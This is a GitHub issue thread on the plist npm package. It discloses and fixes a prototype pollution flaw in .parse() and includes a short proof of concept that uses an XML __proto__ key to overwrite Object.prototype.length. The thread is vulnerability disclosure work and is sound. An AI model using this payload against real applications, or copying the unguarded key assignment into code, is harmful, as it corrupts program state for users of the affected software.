Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Prototype Pollution using .parse() #114

Closed
keerok opened this issue Jan 6, 2022 · 4 comments
Closed

Prototype Pollution using .parse() #114

keerok opened this issue Jan 6, 2022 · 4 comments

Comments

@keerok
Copy link

@keerok keerok commented Jan 6, 2022

Hi, There's a prototype pollution in .parse() related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter.

var plist = require('plist');

var xml = `
<plist version="1.0">
    <key>metadata</key>
    <dict>
      <key>bundle-identifier</key>
      <string>com.company.app</string>
    </dict>
  </plist>`;

console.log(plist.parse(xml));
/**
 * * * * * * * * * * * * * * * * * * * * * * * * * *
 * * * * END OF THE NORMAL CODE EXAMPLE! * * * * * * 
 * * * * * * * * * * * * * * * * * * * * * * * * * * 
 **/


/**
 * * * * * * * * * * * *
 * PROTOTYPE POLLUTION *
 * * * * * * * * * * * *
 **/
var xmlPollution = `
<plist version="1.0">
  <dict>
    <key>__proto__</key>
    <dict>
      <key>length</key>
      <string>polluted</string>
    </dict>
  </dict>
</plist>`;
console.log(plist.parse(xmlPollution).length); // polluted
@mario-canva
Copy link
Contributor

@mario-canva mario-canva commented Mar 14, 2022

The Github advisory states this vulnerability has been fixed on 3.0.4 but I can still reproduce in 3.0.4 as well.

The version 3.0.4 has been released back in August 2021 and the vulnerability was reported on January 2022. The 3.0.4 version only inlines an external dependency so does little in terms of security.

The vulnerable code seems to be on the parsePlistXml function

new_obj[key] = parsePlistXML(node.childNodes[i]);

@TooTallNate will try to submit a PR to fix this vulnerability in the next few days, unless you want to fix yourself.

@mario-canva
Copy link
Contributor

@mario-canva mario-canva commented Mar 21, 2022

Thanks for merging my PR @mreinstein . Would you please release a new version of plist with this fix? So people can patch against this prototype pollution vulnerability.

@mreinstein
Copy link
Collaborator

@mreinstein mreinstein commented Mar 23, 2022

published as 3.0.5 on npm. Thanks for the PR!

@Donhv
Copy link

@Donhv Donhv commented Jun 29, 2022

this issue still happen on version 3.0.5 with nexus scan.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants